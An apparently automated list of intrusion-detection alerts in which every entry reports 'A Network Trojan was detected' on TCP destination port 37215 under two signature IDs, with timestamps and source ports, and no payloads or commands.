                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.796120
                  SID:2829579
                  Source Port:40488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869789
                  SID:2835222
                  Source Port:35164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.801971
                  SID:2835222
                  Source Port:55028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.498788
                  SID:2835222
                  Source Port:39992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.362991
                  SID:2835222
                  Source Port:47378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300019
                  SID:2829579
                  Source Port:38738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.033866
                  SID:2835222
                  Source Port:55918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449640
                  SID:2829579
                  Source Port:56192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.254426
                  SID:2829579
                  Source Port:36910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.757983
                  SID:2835222
                  Source Port:33226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.660601
                  SID:2829579
                  Source Port:35456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.489200
                  SID:2835222
                  Source Port:35726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.466944
                  SID:2835222
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385824
                  SID:2829579
                  Source Port:58088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411416
                  SID:2835222
                  Source Port:33000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.446486
                  SID:2829579
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.648107
                  SID:2829579
                  Source Port:52166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681536
                  SID:2829579
                  Source Port:48818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.658661
                  SID:2835222
                  Source Port:38734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.666546
                  SID:2829579
                  Source Port:34298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.291242
                  SID:2829579
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.456232
                  SID:2835222
                  Source Port:51438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.581833
                  SID:2829579
                  Source Port:37170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.503829
                  SID:2829579
                  Source Port:40974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.647269
                  SID:2835222
                  Source Port:49032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.855642
                  SID:2829579
                  Source Port:52728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758837
                  SID:2835222
                  Source Port:44256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.357505
                  SID:2829579
                  Source Port:60140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985108
                  SID:2829579
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.255405
                  SID:2835222
                  Source Port:50920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.066216
                  SID:2835222
                  Source Port:53392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.517321
                  SID:2835222
                  Source Port:38202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.618604
                  SID:2835222
                  Source Port:54108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.224533
                  SID:2835222
                  Source Port:59048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798195
                  SID:2835222
                  Source Port:34980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983145
                  SID:2835222
                  Source Port:57788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.577459
                  SID:2829579
                  Source Port:53962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188754
                  SID:2835222
                  Source Port:37256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.027883
                  SID:2829579
                  Source Port:41690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351340
                  SID:2829579
                  Source Port:57450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.124026
                  SID:2829579
                  Source Port:47058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2835222
                  Source Port:60392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344652
                  SID:2829579
                  Source Port:55076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.846786
                  SID:2835222
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.936367
                  SID:2829579
                  Source Port:35762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366242
                  SID:2835222
                  Source Port:46610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.556328
                  SID:2829579
                  Source Port:58772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.494095
                  SID:2829579
                  Source Port:40870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.199768
                  SID:2829579
                  Source Port:53066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152800
                  SID:2829579
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951496
                  SID:2829579
                  Source Port:54696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.805293
                  SID:2829579
                  Source Port:52818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.219271
                  SID:2835222
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850187
                  SID:2835222
                  Source Port:47922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433711
                  SID:2829579
                  Source Port:41412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.515408
                  SID:2835222
                  Source Port:34490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2835222
                  Source Port:45174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392999
                  SID:2829579
                  Source Port:54450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.061013
                  SID:2835222
                  Source Port:60074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.439490
                  SID:2829579
                  Source Port:44738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.535959
                  SID:2835222
                  Source Port:36576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.833709
                  SID:2835222
                  Source Port:35042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196325
                  SID:2835222
                  Source Port:36860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824367
                  SID:2835222
                  Source Port:40218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.545793
                  SID:2829579
                  Source Port:37152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.530695
                  SID:2835222
                  Source Port:47056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881781
                  SID:2829579
                  Source Port:36990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.554316
                  SID:2829579
                  Source Port:54870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.122739
                  SID:2835222
                  Source Port:56180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.308630
                  SID:2835222
                  Source Port:39854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.930927
                  SID:2829579
                  Source Port:35518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881754
                  SID:2835222
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260585
                  SID:2829579
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.151172
                  SID:2835222
                  Source Port:60610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.766220
                  SID:2835222
                  Source Port:43096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539050
                  SID:2835222
                  Source Port:48458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640605
                  SID:2829579
                  Source Port:46788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600322
                  SID:2835222
                  Source Port:57676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682664
                  SID:2835222
                  Source Port:54050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.419826
                  SID:2829579
                  Source Port:53752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149960
                  SID:2835222
                  Source Port:47206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.703556
                  SID:2835222
                  Source Port:40934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.243127
                  SID:2829579
                  Source Port:57582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865384
                  SID:2835222
                  Source Port:51704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298616
                  SID:2835222
                  Source Port:36742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497334
                  SID:2835222
                  Source Port:41414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.013020
                  SID:2835222
                  Source Port:37852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.177629
                  SID:2829579
                  Source Port:44638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.508243
                  SID:2835222
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.686618
                  SID:2835222
                  Source Port:53972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.999483
                  SID:2829579
                  Source Port:49498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.858542
                  SID:2835222
                  Source Port:36162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.563593
                  SID:2829579
                  Source Port:51858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.832636
                  SID:2829579
                  Source Port:50596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375795
                  SID:2835222
                  Source Port:52550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.514336
                  SID:2835222
                  Source Port:51766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.990374
                  SID:2829579
                  Source Port:46394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2835222
                  Source Port:59780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.160478
                  SID:2835222
                  Source Port:46982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.229763
                  SID:2835222
                  Source Port:40620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841830
                  SID:2835222
                  Source Port:35528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.193253
                  SID:2835222
                  Source Port:48362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.837652
                  SID:2829579
                  Source Port:60648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:34412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750375
                  SID:2835222
                  Source Port:35664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.214709
                  SID:2829579
                  Source Port:40904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327532
                  SID:2829579
                  Source Port:50290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.463564
                  SID:2829579
                  Source Port:39412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.792052
                  SID:2829579
                  Source Port:44454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.369458
                  SID:2835222
                  Source Port:39454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.742603
                  SID:2829579
                  Source Port:44346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431217
                  SID:2829579
                  Source Port:33624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.660823
                  SID:2835222
                  Source Port:52422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.775247
                  SID:2829579
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.997758
                  SID:2829579
                  Source Port:37172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926953
                  SID:2829579
                  Source Port:60376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.818976
                  SID:2829579
                  Source Port:34586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2835222
                  Source Port:33972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.647956
                  SID:2835222
                  Source Port:56108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670723
                  SID:2835222
                  Source Port:59280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.641366
                  SID:2829579
                  Source Port:44196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.096599
                  SID:2835222
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.128878
                  SID:2829579
                  Source Port:36172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.121135
                  SID:2829579
                  Source Port:58640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.054168
                  SID:2835222
                  Source Port:52160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.078993
                  SID:2829579
                  Source Port:50454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.447518
                  SID:2829579
                  Source Port:37198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.554778
                  SID:2829579
                  Source Port:59720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.432680
                  SID:2829579
                  Source Port:49918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012279
                  SID:2829579
                  Source Port:35264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.593829
                  SID:2829579
                  Source Port:36186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201608
                  SID:2835222
                  Source Port:33640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499192
                  SID:2835222
                  Source Port:41846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.234090
                  SID:2835222
                  Source Port:41152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.892094
                  SID:2835222
                  Source Port:50444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873303
                  SID:2829579
                  Source Port:34756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.184218
                  SID:2835222
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.664822
                  SID:2835222
                  Source Port:52620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.033670
                  SID:2829579
                  Source Port:60156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.966535
                  SID:2829579
                  Source Port:37186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.406013
                  SID:2835222
                  Source Port:58524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.114349
                  SID:2835222
                  Source Port:60914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.901645
                  SID:2829579
                  Source Port:53006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.685142
                  SID:2835222
                  Source Port:44938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.165176
                  SID:2835222
                  Source Port:49644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.808403
                  SID:2835222
                  Source Port:58802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.990207
                  SID:2835222
                  Source Port:49058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.183618
                  SID:2835222
                  Source Port:58242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.757407
                  SID:2829579
                  Source Port:54376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.262409
                  SID:2835222
                  Source Port:52276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.980923
                  SID:2835222
                  Source Port:36740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.010267
                  SID:2829579
                  Source Port:53614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.298138
                  SID:2829579
                  Source Port:40044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024186
                  SID:2829579
                  Source Port:54780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.318563
                  SID:2835222
                  Source Port:37328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877679
                  SID:2829579
                  Source Port:40604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.989466
                  SID:2829579
                  Source Port:44494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.296739
                  SID:2829579
                  Source Port:58952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.969390
                  SID:2829579
                  Source Port:58460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.528584
                  SID:2835222
                  Source Port:58858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571545
                  SID:2829579
                  Source Port:49972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278115
                  SID:2829579
                  Source Port:56824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.871507
                  SID:2829579
                  Source Port:50634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799638
                  SID:2835222
                  Source Port:56962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.827903
                  SID:2835222
                  Source Port:44724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655824
                  SID:2835222
                  Source Port:42822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.654504
                  SID:2835222
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284059
                  SID:2835222
                  Source Port:46658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.973462
                  SID:2829579
                  Source Port:33356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.831923
                  SID:2829579
                  Source Port:33260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.148298
                  SID:2829579
                  Source Port:44346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.612875
                  SID:2835222
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295536
                  SID:2835222
                  Source Port:57262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005251
                  SID:2835222
                  Source Port:37276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2835222
                  Source Port:38892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.949060
                  SID:2829579
                  Source Port:44784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.926609
                  SID:2835222
                  Source Port:60716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175812
                  SID:2835222
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161476
                  SID:2835222
                  Source Port:41906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.802281
                  SID:2829579
                  Source Port:55050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.080140
                  SID:2829579
                  Source Port:50642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959862
                  SID:2835222
                  Source Port:46466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.581630
                  SID:2835222
                  Source Port:48332
                  Destination Port:37215
